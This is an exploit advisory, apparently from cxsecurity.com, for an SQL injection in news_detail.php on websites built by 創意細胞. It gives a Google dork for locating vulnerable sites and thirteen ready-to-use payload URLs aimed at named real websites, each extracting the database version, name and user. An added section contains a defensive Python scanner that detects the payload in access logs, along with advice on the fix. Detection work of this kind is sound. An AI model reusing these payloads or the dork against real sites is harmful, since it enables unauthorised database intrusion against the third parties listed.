網站建置 by 創意細胞 SQL Injection

2016.01.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

######################
# Exploit Title : 網站建置 by 創意細胞 SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.mydesigncell.com/
# Google Dork : intext:"創意細胞" inurl:news_detail.php?
# Date: 2016 01 10
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
#
# demos :
# http://www.louyoung.org.tw/news_detail.php?id=20%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.4flower.com.tw/news_detail.php?id=28%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.anajessica.com.tw/news_detail.php?id=10%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.hjc.tw/news_detail.php?id=5%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.prettycentury.com/news_detail.php?id=34%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.vigorbeauty.com/news_detail.php?id=2%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.holove.com.tw/news_detail.php?id=15%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.ps-hair.com.tw/news_detail.php?id=156%27%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--%20-
# http://www.charmeurlady.com/news_detail.php?id=6%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.labbybaby.com.tw/news_detail.php?id=14%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.kiskisbaby.com/news_detail.php?id=4%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.renova.com.tw/news_detail.php?id=2%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.vigorbeautyspa.com.tw/news_detail.php?id=33%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
######################
# discovered by : modiret
######################
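
An added detection example, not part of the original advisory: it scans web access-log lines for requests to news_detail.php whose id parameter is not a plain integer, and tags the GROUP BY / floor(rand(0)*2) pattern seen in the demo requests. The log lines, client addresses and function names are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside an Apache/nginx "combined" access-log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Signature of the error-based payload in the advisory: a GROUP BY over a key
# built with floor(rand(0)*2), which makes MySQL raise a duplicate-key error
# that echoes version(), database() and user().
ERROR_BASED_RE = re.compile(r'group\s+by\s+.*floor\s*\(\s*rand\s*\(', re.I | re.S)

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jan/2016:10:00:01 +0800] "GET /news_detail.php?id=20 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [10/Jan/2016:10:00:07 +0800] "GET /news_detail.php?id=20%20or%201%20group'
    '%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)'
    '%20or%201-- HTTP/1.1" 200 812',
    '192.0.2.67 - - [10/Jan/2016:10:01:30 +0800] "GET /news_detail.php?id=7%27 HTTP/1.1" 500 0',
]

def classify_id(value):
    """Return 'ok', 'error-based-sqli' or 'non-numeric-id' for a decoded id value."""
    if re.fullmatch(r'\d{1,10}', value):
        return 'ok'
    if ERROR_BASED_RE.search(value):
        return 'error-based-sqli'
    return 'non-numeric-id'

def scan(lines, script='news_detail.php', param='id'):
    """Yield (client_ip, verdict, decoded_value) for each suspicious request."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith('/' + script):
            continue
        # parse_qs percent-decodes, so %20 and %27 are normalised before matching.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            verdict = classify_id(value)
            if verdict != 'ok':
                yield line.split(' ', 1)[0], verdict, value

if __name__ == '__main__':
    for ip, verdict, value in scan(SAMPLE_LOG):
        print(f'{ip}\t{verdict}\t{value!r}')
```

The same integer-only check belongs in the application itself, before the id value reaches the query, together with a parameterised statement.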


Copyright 2026, cxsecurity.com

 
